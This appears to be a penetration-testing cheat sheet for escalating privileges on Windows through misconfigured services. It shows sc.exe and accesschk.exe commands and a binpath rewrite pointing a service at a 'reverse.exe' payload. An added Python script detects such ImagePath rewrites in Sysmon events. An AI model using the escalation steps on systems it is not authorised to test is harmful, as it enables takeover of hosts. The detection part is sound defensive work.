Service Exploitation

Basic commands for abusing a misconfigured service to elevate privileges, once a candidate service has been identified with a tool such as WinPEAS.

Basic Commands

# Query the configuration of a service
sc.exe qc $service_name

# Query the current status of a service
sc.exe query $service_name

# Modify an option on a service (sc.exe syntax requires a space after the = sign)
sc.exe config $service_name $option= $value

# Start and stop a service
net start/stop $service_name

Accesschk.exe

Use Accesschk.exe to validate service permissions:

.\accesschk.exe /accepteula -uwcqv user $service_name
  • In the output, look for the SERVICE_START and SERVICE_STOP permissions granted to the current user.

  • Also confirm that the service runs under a more privileged account (e.g., LocalSystem).

Notes

  • Check whether you can start/stop the service, or reboot the machine. If you cannot, you may not be able to use the service to escalate privileges, since the modified configuration only takes effect when the service is restarted.

  • Check whether the current account can reboot the system with whoami /priv.

  • An easy way to escalate privileges through a service is to modify its binary path (binpath). The following is an example:

sc config $service_name binpath= "\"C:\Windows\Tasks\reverse.exe\""
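Added example for the defensive side of the binpath rewrite above (not part of the original cheat sheet): a `sc config ... binpath=` call ends up as a write to HKLM\SYSTEM\CurrentControlSet\Services\<svc>\ImagePath, which Sysmon records as Event ID 13 (RegistryEvent, value set). The script below flags such writes when the new executable sits under a user-writable directory; the event records are constructed and the directory list is a hypothetical starting point.

```python
# Added example: detect service ImagePath rewrites pointing at user-writable
# locations in Sysmon Event ID 13 records. Sample events are constructed.
import re
from typing import Optional

# Locations a low-privileged user can normally write to (hypothetical list,
# tune it for the environment).
USER_WRITABLE_PREFIXES = (
    "c:\\windows\\tasks\\", "c:\\windows\\temp\\", "c:\\users\\", "c:\\programdata\\",
)

# Matches the ImagePath value of any service under the current or a numbered control set.
IMAGEPATH_RE = re.compile(
    r"^hklm\\system\\(?:currentcontrolset|controlset\d+)\\services\\(?P<svc>[^\\]+)\\imagepath$",
    re.IGNORECASE,
)

def binary_from_details(details: str) -> str:
    """Extract the executable from the Sysmon 'Details' value: honour a quoted
    path, otherwise take the first whitespace-delimited token (lower-cased)."""
    d = details.strip().lower()
    if d.startswith('"'):
        return d[1:].split('"', 1)[0]
    return d.split(" ", 1)[0]

def flag_imagepath_change(event: dict) -> Optional[dict]:
    """Return an alert if `event` (Sysmon EID 13 fields) sets a service ImagePath
    to an executable under a user-writable directory, else None."""
    if event.get("EventID") != 13:
        return None
    m = IMAGEPATH_RE.match(event.get("TargetObject", ""))
    if not m:
        return None
    binary = binary_from_details(event.get("Details", ""))
    if not binary.startswith(USER_WRITABLE_PREFIXES):
        return None
    # The writing process is services.exe no matter who ran sc.exe, so the rule
    # keys on target object and new value rather than on the Image field.
    return {"service": m.group("svc"), "binary": binary, "writer": event.get("Image", "")}

def scan(events: list) -> list:
    """Run the detection over a batch of events and return every alert."""
    return [a for a in (flag_imagepath_change(e) for e in events) if a]

SAMPLE_EVENTS = [  # constructed, abbreviated Sysmon-style records
    {"EventID": 13, "Image": "C:\\Windows\\system32\\services.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\ExampleSvc\\ImagePath",
     "Details": "\"C:\\Windows\\Tasks\\reverse.exe\""},  # rewritten binpath
    {"EventID": 13, "Image": "C:\\Windows\\system32\\services.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\Spooler\\ImagePath",
     "Details": "C:\\Windows\\System32\\spoolsv.exe"},  # benign location
    {"EventID": 13, "Image": "C:\\Windows\\system32\\services.exe",
     "TargetObject": "HKLM\\System\\CurrentControlSet\\Services\\ExampleSvc\\Start",
     "Details": "DWORD (0x00000003)"},  # start-type change, not a path
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

The rewrite itself requires SERVICE_CHANGE_CONFIG on the service, so the preventive control is the service DACL; this detection covers the case where that control has already failed, and the sc.exe invocation should be correlated separately from process-creation events.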
